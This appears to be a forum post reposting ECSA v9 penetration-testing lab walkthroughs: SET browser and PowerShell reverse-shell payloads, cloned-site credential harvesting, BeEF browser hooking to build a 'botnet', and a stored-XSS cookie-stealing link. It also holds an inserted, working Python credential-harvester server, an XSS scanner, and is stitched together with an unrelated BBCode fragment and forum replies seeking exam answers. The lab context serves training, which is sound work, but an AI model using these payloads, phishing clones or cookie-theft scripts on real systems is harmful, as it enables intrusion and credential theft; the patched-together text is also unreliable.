A list of menus in Social-Engineering Attacks will appear, type 2 and press Enter to choose Website Attack Vectors.
7. Choose Metasploit Browser Exploit Method
In the next menu that appears, type 2 and press Enter to choose Metasploit Browser Exploit Method.
8. Create a Cloned Website
Now, type 2 and press Enter to choose Site Cloner option from the menu.
9. NAT/PORT Forwarding
Type no and press Enter, since you are not using NAT/PORT Forwarding.
10. IP Address for Reverse Connection
Type the IP address of Kali Linux Subnet A machine and press Enter.
The IP address for reverse connection, entered in this lab is 10.10.10.6.
The target machine will establish a connection with the machine bearing the IP address 10.10.10.6 (Kali Linux) after it is subjected to exploitation.
11. Create a Cloned Website
Now, you will be prompted for a URL to be cloned, type the desired URL for “Enter the url to clone” and press Enter. In this lab, we have used http://www.xsecurity.com. This will initiate the cloning of the specified website.
12. Choose a Browser Exploit
Choose a Browser Exploit with which you want to exploit the vulnerable target. In this lab, the exploit used is Java Applet JMX Remote Code Execution (Updated 2013-01-19).
As the Exploit's index number is 1, type 1 and press Enter.
13. Choose a Payload
Choose a payload with which you want to exploit the vulnerable target. In this lab, the payload used is Windows Meterpreter Reverse DNS.
As the payload's index number is 10, type 10 and press Enter.
14. Choose the Default Port Number
Simply press Enter to choose the default port number.
15. Browser Exploit Initiated
SET now initiates payload handler.
Now, send the malicious link (which contains the IP address of Kali Linux machine i.e., http://10.10.10.6:8080) through mail or any other means.
In real-time, when a victim clicks the link, the payload will be executed and the attacking machine gains connection with the victim machine.
The Victim machine used in this lab is Accounts Department Subnet D.
16. Logon to Accounts Department Subnet D
Select Accounts Department Subnet D from the Machines pane and log in to it.
17. Browse the Cloned Website
Launch Google Chrome web browser, type the URL http://10.10.10.6:8080 in the address bar and press Enter.
As soon as you press Enter, a notification appears saying JAVA was blocked. Click Run this time.
18. Session Established
As soon as you click Run, a meterpreter session is established in the Kali Linux machine. Type sessions -i 1 and press Enter to interact with meterpreter session 1.
19. Generate a Report
As you can't generate a report in such a case, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
20. Generate a Report (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
21. Generate a Report (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named Browser_exploit_meterpreter; the root/ Home folder location has been chosen to save the file.
22. Screenshot Saved
The screenshot has been saved to the home folder as shown in the following screenshot:
In this lab, you have learned how to:
• Generate a Browser Exploit
• Perform Penetration Testing on the Vulnerable Machine

Penetration Testing a Machine Using Powershell Attack Vectors
The Powershell Attack Vector module allows you to create PowerShell-specific attacks. These attacks will allow you to use PowerShell, which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by Preventative Technologies.
The objective of this lab is to help student learn how to:
• Generate Powershell Exploits
• Perform Penetration Testing on a Machine
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Choose Social Engineering Attacks
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Choose Powershell Attack Vectors
A list of menus in Social-Engineering Attacks will appear, type 10 and press Enter to choose Powershell Attack Vectors.
7. Choose Powershell Alphanumeric Shellcode Injector
In the next menu that appears, type 1 and press Enter to choose Powershell Alphanumeric Shellcode Injector.
8. IP Address for Payload Listener
Type the IP address of Kali Linux Subnet A machine and press Enter.
The IP address for payload listener, entered in this lab is 10.10.10.6.
The target machine will establish a connection with the machine bearing the IP address 10.10.10.6 (Kali Linux) after it is subjected to exploitation.
9. Choose the Default Port Number
Simply press Enter to choose the default port number.
10. Start the Listener
You need to start the payload listener. So type yes and press Enter. This will initiate the payload listener.
11. Payload Handler Initiated
SET now initiates payload handler.
Now, configure the payload and send it through mail or any other means.
In real-time, when a victim executes the payload the attacking machine gains connection with the victim machine.
12. Copy the Payload to Desktop
Open a new command line terminal, type the command cd /root/.set/reports/powershell and press Enter. This will change the pwd (present working directory) from root to /root/.set/reports/powershell.
13. Copy the Payload to Desktop (Cont'd)
Issue the command cp x86_powershell_injection.txt ~/Desktop and press Enter. This copies the file x86_powershell_injection.txt onto Desktop.
14. Change the File Format to bat
The text file is now saved to Desktop. You need to change the file format from .txt to .bat. For this, you need to simply replace .txt with .bat.
15. Share the Payload File
Type the command cp /root/Desktop/x86_powershell_injection.bat /var/www/share and press Enter. This copies the file to share folder.
In real-time, attackers share this file with the victim by sending the file through mail, shared network drives or any other medium. As soon as the victim executes the file, the attacking machine establishes connection with the victim machine.
16. Start Apache Service
Launch a new command line terminal, type the command service apache2 start and press Enter. This will begin the apache server, which allows you to share the file with other devices inside/outside the network.
17. Logon to Database Server Subnet B
Select Database Server Subnet B from Machines pane, log in to it and close the Server Manager window.
18. Download the Payload
Launch Mozilla web browser, type the URL http://10.10.10.6/share and press Enter.
A webpage appears displaying the payload. Click the link x86_powershell_injection.bat in order to download the payload.
19. Download the Payload (Cont'd)
Opening x86_powershell_injection.bat pop-up appears, click Save File button to save the payload on the machine.
20. Execute the Payload
The payload is saved to the location C:\Users\Administrator\Downloads by default. Navigate to the location and double-click x86_powershell_injection.bat.
An Open File - Security Warning pop-up appears, click Run in order to execute the payload.
21. Payload Executed Successfully
As soon as you click Run, a Windows shell opens and random text scrolls in it for a fraction of a second, and then the shell closes automatically. Now, the payload is successfully executed.
22. Meterpreter Session Established
As soon as you click Run, a meterpreter session will be opened. Type sessions -i 1 and press Enter. This will establish the meterpreter session as shown in the following screenshot:
23. Obtain the System Information
Type the command sysinfo and press Enter. This returns the OS related information of the target machine as shown in the following screenshot:
24. Generate a Report
As you can't generate a report in such a case, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
25. Generate a Report (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
26. Generate a Report (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named powershell_meterpreter.
The root/ Home folder location has been chosen to save the file.
27. Screenshot Saved
The screenshot has been saved to the home folder as shown in the following screenshot:
In this lab, you have learned how to:
• Generate Powershell Exploits
• Perform Penetration Testing on a Machine

Penetration Testing Vulnerable Machines and Creating a Botnet
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
The objective of this lab is to help students learn how to:
• Use the Browser Exploitation Framework (BeEF)
• Attain Credentials of a user account in plain text
• Establish a botnet of vulnerable machines
1. Logon to Kali Linux Subnet A
Select Kali Linux Subnet A from the Machines Pane.
Click Other....
2. Logon to Kali Linux Subnet A (Cont'd)
Type root in the username field and click Log In.
3. Logon to Kali Linux Subnet A (Cont'd)
Type toor in the password field and click Log In.
4. Launch Social Engineering Toolkit
Go to Applications --> Kali Linux --> Exploitation Tools --> Social Engineering Toolkit --> se-toolkit.
5. Create a Cloned Website
You will be presented with a social engineering toolkit menu.
Type 1 and press Enter to choose Social-Engineering Attacks option.
6. Create a Cloned Website (Cont'd)
A list of menus in Social-Engineering Attacks will appear, type 2 and press Enter to choose Website Attack Vectors.
7. Create a Cloned Website (Cont'd)
In the next menu that appears, type 3 and press Enter to choose Credential Harvester Attack Method.
8. Create a Cloned Website (Cont'd)
Now, type 2 and press Enter to choose Site Cloner option from the menu.
9. Create a Cloned Website (Cont'd)
Type the IP address of Kali Linux machine in the prompt for “IP address for the POST back in Harvester/Tabnabbing”and press Enter. In this lab, the IP address is 10.10.10.6.
10. Create a Cloned Website (Cont'd)
Now, you will be prompted for a URL to be cloned, type the desired URL for “Enter the url to clone” and press Enter. In this lab, we have used moviescope.xsecurity.com.
By entering the credentials, SET will initiate the cloning of the specified website.
moviescope.xsecurity.com is another service of http://www.xsecurity.com.
11. Website Cloned Successfully
SET has successfully cloned the website.
Now, send the malicious link (which contains the IP address of Kali Linux machine i.e., http://10.10.10.6) through mail or any other means.
In real-time, when a victim clicks the link, he/she will be redirected to the cloned website. Whatever the victim types in the login or any other text fields associated to the cloned website, they will be captured by SET and displayed on the SET screen.
12. Logon to Advertisement Dept. Subnet D Machine
Select Advertisement Dept. Subnet D from the Machines pane and log in to the Administrator account of the machine.
13. Browse the Cloned Website
Launch Mozilla Firefox or any other web browser, type the URL http://10.10.10.6 in the address bar and press Enter.
As soon as you enter the URL, the cloned webpage is displayed as shown in the following screenshot:
14. Log in to the Cloned Website
The cloned website appears on the browser. Assume that you are a user in the moviescope and you have access to the webpage.
Log in to the website using the following credentials:
Username: kety
Password: test
15. moviescope Legitimate Home Page
As soon as you click the Login button, you won't be able to log in; instead, you will be redirected to the legitimate home/login page of moviescope. You will be able to recognize this by observing the URL in the address bar.
In the meanwhile, SET running on the Kali Linux machine harvests the credentials.
16. Credentials Harvested Successfully
Switch to Kali Linux Subnet A machine by selecting it from the Machines pane.
You will be able to view the harvested credentials as shown in the following screenshot:
It is evident that the passwords are retrieved in plain text.
17. Log in to moviescope
Now, launch a web browser and use these credentials to log in to moviescope.
18. User Successfully Logged In
You are successfully logged in to the web application as shown in the following screenshot:
19. Launch a New Command Line Terminal
Minimize the webpage and launch a new command line terminal.
20. Change the Working Directory
Type the command cd /usr/share/beef-xss and press Enter. This changes the present working directory from root to beef-xss.
21. Launch beef
Type the command ./beef and press Enter. This launches browser exploitation framework (BeEF).
To access the BeEF UI, note the link http://10.10.10.6:3000/ui/panel.
You will have to access this page in a web browser and log in to it.
22. Access the BeEF Web Application
Launch Iceweasel web browser, paste the URL in the address bar and press Enter.
BeEF login page appears on the browser. Enter the following credentials to log in to the web application:
Username: beef
Password: beef
23. Copy the Link Location
The BeEF home page appears on the browser window. Under the Getting Started section, you will observe two "here" links.
Right-click the first here link and select Copy Link Location.
Now, you need to paste the link in the Blog page of moviescope website.
24. Paste the Link
Maximize the browser window in which you have logged in to moviescope. Click on Blog tab.
25. Paste the Link (Cont'd)
Blog page appears; scroll down to the Leave a Comment section, paste the link in the Comment field and click Submit Comment.
26. Link Successfully Submitted
A comment link is posted on the page. Now, log in to the website from other machines and open the URL. As soon as you open the webpage, the browser exploitation framework running in this machine (Kali Linux Subnet A) attains connection with the machine. This way, a botnet will be created.

27. Open the Link from Database Server Subnet B
Log in to Database Server Subnet B and close the Server Manager window.
Launch the Firefox web browser and log in to moviescope.xsecurity.com using the following credentials:
Username: John
Password: Test
Assume that you are a user named John.
28. Click on Blog Tab
You are logged in to the website. Click on Blog tab:
29. Open the URL
Blog webpage appears on the browser window. Scroll down the page and copy the URL.
30. Open the URL (Cont'd)
Open a new tab, paste the URL and press Enter. As soon as you open this webpage, BeEF running in Kali Linux Subnet A machine establishes connection with this machine.
31. Open the Link from Active Directory Subnet C
Select Active Directory Subnet C from the Machines pane, log in to it and close the Server Manager window.
Log in to moviescope.xsecurity.com using the following credentials:
Username: sam
Password: test
Here, you are logging into the website as a user named Sam.
32. Click on Blog Tab
You are logged in to the website. Click on Blog tab:
33. Open the URL
Blog webpage appears on the browser window. Scroll down the page and copy the URL.
34. Open the URL (Cont'd)
Open a new tab, paste the URL and press Enter. As soon as you open this webpage, BeEF running in Kali Linux Subnet A machine establishes connection with this machine.
35. Open the Link from Accounts Dept Subnet D
Select Accounts Dept Subnet D from the Machines pane, and log in to it.
Log in to moviescope.xsecurity.com using the following credentials:
Username: steve
Password: test
Here, you are logging into the website as a user named Steve.
36. Click on Blog Tab
You are logged in to the website. Click on Blog tab.
37. Open the URL
Blog webpage appears on the browser window. Scroll down the page and copy the URL.
38. Open the URL (Cont'd)
Open a new tab, paste the URL and press Enter. As soon as you open this webpage, BeEF running in Kali Linux Subnet A machine establishes connection with this machine.
39. Switch to Kali Linux Subnet A Machine
Select Kali Linux Subnet A from the Machines pane and maximize the browser in which you are logged in to BeEF.
40. Observe the Logs
Click on Logs tab. You will observe that all the three machines Database Server Subnet B, Active Directory Subnet C and Accounts Dept Subnet D are connected to the Browser Exploitation Framework (BeEF) by observing the logs.
You can observe them even in the left pane under 10.10.10.6 directory (under Online Browsers).
41. Generate a Report
As you can't generate a report in this case, you need to take screenshots of each of them and place these screenshots in the pentesting folder where you are dumping all the scan results.
To take screenshot, go to Applications --> Accessories --> Screenshot.
42. Generate a Report (Cont'd)
Take Screenshot pop-up appears, click Take Screenshot button.
43. Generate a Report (Cont'd)
Save Screenshot pop-up appears, specify a name for the screenshot, select a location where you wish to save the file and click Save button.
In this lab, the screenshot is named Botnet_BeEF.
The root/ Home folder location has been chosen to save the file.
44. Screenshot Saved
The screenshot has been saved to the home folder as shown in the following screenshot:
In the same way, click on each victim machine's IP address, take a screenshot of each of them and place the screenshots in the pentesting folder.
In this lab, you have learned how to:
• Use the Browser Exploitation Framework (BeEF)
• Attain Credentials of a user account in plain text
• Establish a botnet of vulnerable machines

Penetration Testing a Website for Stored XSS Vulnerability
Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored Cross-Site scripting attacks are persistent attacks which remain implanted on the target server until their existence is detected and removed. When an employee in an organization unknowingly becomes victim to this script, attackers gain the session ID corresponding to the victim, and thereby attain the victim's session without legitimately logging in to the web application. As an Ethical hacker or a Penetration Tester, you need to safeguard a website from executing such malicious scripts and thereby protect the user sessions from being stolen.
The objective of this lab is to help students learn how to:
• Test web applications for vulnerabilities
• Use Firebug to hijack a session
1. Logon to Windows 8
Select Windows 8 Subnet A from the Machines pane. Go to Commands and click Ctrl + Alt + Delete.
2. Enter the Credentials
In the log in window, enter the following Credentials and press Enter:
User Name: Student
Password: Pa$$w0rd
3. Log In to moviescope Website
Launch Firefox web browser, type the URL http://moviescope.xsecurity.com in the address bar and press Enter.
moviescope login/home page appears as shown in the following screenshot:
4. Log In to moviescope Website (Cont'd)
Log in to MovieScope assuming that you are a user. Use the following credentials to log in to the website:
Username: steve
Password: test
5. Click on Blog Tab
You are logged in as a general user and note that you do not have any admin privileges. Click on Blog tab.
6. Enter the Malicious Script
Blog page appears; scroll down to Leave a Comment section, enter the following query in the Comment field and click Submit Comment.
<a onclick="document.location='http://10.10.10.3/oceanplaza/Default.aspx?cookie='+escape(document.cookie);" href="#"> Please click here to visit website </a>
7. Script Successfully Submitted
A comment link is posted stating “Please click here to visit website” (as we have stated this comment in the query posted in the previous task).
Now, whenever a user who has logged in to the website visits this webpage (Blog webpage) and clicks on the link, the malicious script running behind the link gets activated, and immediately the cookie value is stored in a file named Mycookies.txt in the location C:\inetpub\wwwroot\oceanplaza\CookieSteal.
8. Log on to Web Server Subnet C
Log on to Web Server Subnet C machine's Administrator account.
9. Close the Server Manager Window
Click on Close button at the top right corner of the Server Manager window.
10. Log in to moviescope
Launch Firefox browser, type the URL http://moviescope.xsecurity.com in the address bar and press Enter.
moviescope login/home page appears as shown in the following screenshot:
11. Log in to moviescope (Cont'd)
Assume that you are the admin user and log in to the website using the following credentials:
Username: sam
Password: test
12. Click on Blog Tab
You are logged in as an admin user and you can observe that the webpage displays your role (Admin) adjacent to Logout. Click on Blog tab:
13. Click the Malicious Link
Blog webpage appears on the browser window. Scroll down the page and click Please click here to visit website link.
14. Cookie Stealing Attack Performed
The admin (victim) is redirected to the oceanplaza website’s Default.aspx webpage. Click the here link.
In real-time, seeing the blank/unavailable webpage, he/she clicks here link to go back to the previous page, being unaware of the fact that an attack has been performed to steal the cookie.
15. moviescope Blog Webpage
You will be redirected to moviescope's Blog webpage as shown in the following screenshot:
Do not log out of the website as long as you perform this lab.
16. Launch Windows 8 Subnet A
Select Windows 8 Subnet A machine from the Mach

Using the hide tag
[ hide ][ url=http://labmentor.net]name description[ /url ][ /hide]

Example:
With http://labmentor.net is link upload.
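The web-jacking and credential-harvester labs above both rely on the same mechanism: a cloned login page is served from the Kali box, whatever the victim submits is written to harvester.log, and the victim is then redirected to the legitimate site. The following is an added Python example that reconstructs that POST-back flow in miniature; it is not SET's own code. Assumptions not taken from the lab: the listener binds 127.0.0.1 on an ephemeral port, the cloned page is a constructed two-field form rather than a real clone, and captured posts are kept in memory (with a JSON-lines dump standing in for harvester.log).

```python
"""Minimal credential-harvester POST-back, modelled on the SET Harvester/Tabnabbing
flow described in the lab. Added example, not SET's code.

Assumptions (not from the lab): 127.0.0.1 and an ephemeral port for the listener,
a constructed two-field login form as the "clone", an in-memory record list
standing in for harvester.log."""
import json
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

# Redirect target after capture: the legitimate site named in the lab.
LEGIT_URL = "http://moviescope.xsecurity.com/"

# Constructed stand-in for the cloned page (a real clone would be the site's HTML).
CLONED_LOGIN_PAGE = b"""<html><body>
<form method="POST" action="/"><input name="username">
<input name="password" type="password"><input type="submit" value="Login"></form>
</body></html>"""


class Harvester:
    """In-memory stand-in for SET's harvester.log."""

    def __init__(self):
        self.records = []
        self._lock = threading.Lock()

    def record(self, client_ip, fields):
        entry = {"time": time.strftime("%Y-%m-%d %H:%M:%S"), "client": client_ip, "fields": fields}
        with self._lock:
            self.records.append(entry)
        return entry

    def as_log(self):
        """One JSON line per captured post, the form a report step would write to disk."""
        return "\n".join(json.dumps(r, sort_keys=True) for r in self.records)


def parse_form_body(body, content_type):
    """Decode an application/x-www-form-urlencoded body into {field: value}; keep anything else raw."""
    if not content_type.lower().startswith("application/x-www-form-urlencoded"):
        return {"_raw": body}
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def handle_request(method, headers, body, harvester, client_ip="0.0.0.0"):
    """Core logic: GET serves the clone, POST captures the fields and 302s to the real site."""
    if method == "GET":
        return 200, {"Content-Type": "text/html"}, CLONED_LOGIN_PAGE
    if method == "POST":
        fields = parse_form_body(body, headers.get("Content-Type", ""))
        harvester.record(client_ip, fields)
        return 302, {"Location": LEGIT_URL}, b""
    return 405, {"Allow": "GET, POST"}, b""


def make_handler(harvester):
    """Bind the pure handle_request() to http.server so the flow can be exercised with a browser."""

    class Handler(BaseHTTPRequestHandler):
        def log_message(self, *args):  # keep the console quiet; captures live in `harvester`
            pass

        def _dispatch(self):
            length = int(self.headers.get("Content-Length") or 0)
            body = self.rfile.read(length).decode("utf-8", "replace") if length else ""
            status, hdrs, payload = handle_request(
                self.command, self.headers, body, harvester, self.client_address[0])
            self.send_response(status)
            for name, value in hdrs.items():
                self.send_header(name, value)
            self.send_header("Content-Length", str(len(payload)))
            self.end_headers()
            self.wfile.write(payload)

        do_GET = do_POST = _dispatch

    return Handler


def start_harvester(host="127.0.0.1", port=0):
    """Start the listener in a background thread; port 0 picks a free port."""
    harvester = Harvester()
    server = ThreadingHTTPServer((host, port), make_handler(harvester))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, harvester


if __name__ == "__main__":
    srv, hv = start_harvester()
    print("harvester listening on http://%s:%d/ (Ctrl+C to stop)" % srv.server_address)
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        srv.shutdown()
        print(hv.as_log())
```

The 302 to the real login page is what makes the victim see "the legitimate home/login page" after submitting, exactly as step 15 of the lab describes; the only evidence on the client side is the address bar change, which is why the lab tells you to check it.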
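The stored-XSS lab above posts an <a> element whose onclick handler ships document.cookie to a collector; the comment is stored verbatim and rendered back to every visitor. The following added Python example (not the lab's or the moviescope application's code) shows the two checks a tester would want after that lab: a scanner that flags active content in stored comments, and the vulnerable rendering beside the output-encoded one. Assumptions not taken from the lab: comments are plain strings rendered into a div, and the session cookie uses ASP.NET's default name ASP.NET_SessionId.

```python
"""Stored-XSS check for blog-comment rendering. Added example, not the lab's code.

Assumptions (not from the lab): comments are raw strings dropped into a <div>;
the session cookie is the default ASP.NET_SessionId."""
import html
from html.parser import HTMLParser

# The payload as posted in the lab (copied from the lab text).
LAB_PAYLOAD = ('<a onclick="document.location=\'http://10.10.10.3/oceanplaza/Default.aspx'
               '?cookie=\'+escape(document.cookie);" href="#"> Please click here to visit website </a>')
# Constructed benign comment for contrast.
BENIGN_COMMENT = "Great movie, five stars!"

ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action", "formaction"}


class ActiveContentScanner(HTMLParser):
    """Collect findings for markup that can run script when the comment is rendered."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append("<%s> element" % tag)
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip()
            if name.startswith("on"):
                self.findings.append("event handler %s on <%s>" % (name, tag))
                if "document.cookie" in value:
                    self.findings.append("reads document.cookie")
            elif name in URL_ATTRS and value.lower().startswith("javascript:"):
                self.findings.append("javascript: URL in %s on <%s>" % (name, tag))
                if "document.cookie" in value:
                    self.findings.append("reads document.cookie")


def scan_comment(text):
    """Return a list of findings; an empty list means no active content was parsed."""
    scanner = ActiveContentScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


def render_comment_vulnerable(comment):
    """What the lab's blog does: the stored string is interpolated as markup."""
    return '<div class="comment">%s</div>' % comment


def render_comment_safe(comment):
    """Output encoding: the browser shows the payload as text instead of parsing it."""
    return '<div class="comment">%s</div>' % html.escape(comment, quote=True)


def session_cookie_header(session_id):
    """HttpOnly keeps document.cookie from exposing the id even if an XSS slips through.
    (Attribute choice is this example's assumption, not the lab's configuration.)"""
    return "Set-Cookie: ASP.NET_SessionId=%s; HttpOnly; SameSite=Lax; Path=/" % session_id


if __name__ == "__main__":
    for label, comment in (("lab payload", LAB_PAYLOAD), ("benign", BENIGN_COMMENT)):
        print(label, "->", scan_comment(comment) or "clean")
    print("vulnerable:", render_comment_vulnerable(LAB_PAYLOAD))
    print("safe:      ", render_comment_safe(LAB_PAYLOAD))
    print(session_cookie_header("example-session-id"))
```

Running scan_comment over the escaped render returns nothing because the browser (and the parser) now sees &lt;a ...&gt; as text; the scanner is a quick triage for already-stored comments, and output encoding plus HttpOnly is the fix the lab's closing sentence asks for.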
09-21-2017, 12:08 AM (This post was last modified: 09-21-2017 12:10 AM by simburel.)
Post: #3
RE: ECSA v9 Labs
Many thanks to you for sharing this!

Is there anyone who can provide ECSAv9 lab challenges? A brief description of the challenge, and what the solution was. I mean the challenges which go as the lab exam at the end of the course. Many thanks
09-23-2017, 12:56 AM
Post: #4
RE: ECSA v9 Labs
How about lab challenges, thanks